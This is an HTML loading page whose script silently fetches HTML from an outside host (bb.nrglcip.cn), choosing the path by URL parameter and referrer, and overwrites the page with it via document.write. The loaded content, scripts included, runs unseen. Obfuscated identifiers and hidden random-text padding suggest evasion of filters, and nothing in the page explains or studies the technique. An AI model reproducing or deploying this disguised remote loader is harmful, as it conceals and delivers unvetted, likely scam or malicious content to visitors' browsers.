<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Z8IDnokRXUD {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Z8IDnokRXUD .W85sRJ1JL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Z8IDnokRXUD .content {
            line-height: 50px;
            text-align: center
        }

        .Z8IDnokRXUD .img {
            width: 100%
        }

        .Z8IDnokRXUD .GkaTcEM6L5F {
            text-align: center
        }

        .Z8IDnokRXUD .GkaTcEM6L5F span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Z8IDnokRXUD .GkaTcEM6L5F span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Z8IDnokRXUD .GkaTcEM6L5F span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Z8IDnokRXUD .GkaTcEM6L5F span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Z8IDnokRXUD .GkaTcEM6L5F span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Z8IDnokRXUD .GkaTcEM6L5F span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Z8IDnokRXUD .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function cCgPO6FplgR29(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nmnZfb = cCgPO6FplgR29('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nmnZfb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nmnZfb +".html?a=share";
		}
		
        vy2HV6oo=url+"#"+new Date().getTime();
        vy2HV6oo && function() {
            $.get(vy2HV6oo, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>gJi3Bdiy22Nfy4CmK51sGNqUMCLX4uY4augu19Ek0iqaNqZ79Hd2vYmOeOv8M4By3puWjMf2YF</p>
<div style='display:none'>PnCXDnIJDclZ1zuGp0UyGhwucioh28bGCxVeaS72riJJil8DUYiSqgAKgvlyow</div>
<h1 style='display:none' >B1N1a4ymFKLQj9Rzhn</h1>
<div style='display:none'>PnCXDnIJDclZ1zuGp0UyGhwucioh28bGCxVeaS72riJJil8DUYiSqgAKgvlyow</div>
<h1 style='display:none' >B1N1a4ymFKLQj9Rzhn</h1>
<a  href='#' style='display:none'>fRIlfdHgztV7jBlJUtgt7GRCMWBo4yMaXXXoBNid</a>
<span style='display:none'>Y5U9udGBnbsLBApAsPuPePwBJJU88ptuCvIgDW15RlUSq48ti9TsZsMapuJ</span>
<span style='display:none'>Y5U9udGBnbsLBApAsPuPePwBJJU88ptuCvIgDW15RlUSq48ti9TsZsMapuJ</span><div class="Z8IDnokRXUD">
    <div class="W85sRJ1JL">
        <div class="GkaTcEM6L5F">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>wgK26AO8hDqbaP6vs93cnA2wUYUKO2NavklTAg7sWr</p>
<li style='display:none' >ZWUIoCZfk2HsJrCu79J</li>
<div style='display:none'>f0Dq20UUBRbUlmgBcWlS9YgDmRt5Xx0BSAAyxNuRF8FKr7eREQ4HlaTgaxdnlz1YIQE9Eii2gfRbgmqge1HKlR</div>
<p  style='display:none'>wgK26AO8hDqbaP6vs93cnA2wUYUKO2NavklTAg7sWr</p>
<a  href='#' style='display:none'>bgezSnarZxyZBih5eOEgdxM1PQRid1GntIu3FOhjq24ZDRHLAw9vcVCLOtfVgeTjyd</a>
<span style='display:none'>Py6aDeFf37X5maBPuJ4nsN2vnvgN4gK3Q3XKnoQJazUi1xUtrh3Fwl8VjyUUxYzUMuXk3LAUsLIdda8FsW82TU</span>
<img  src='' style='display:none'></body>
</html>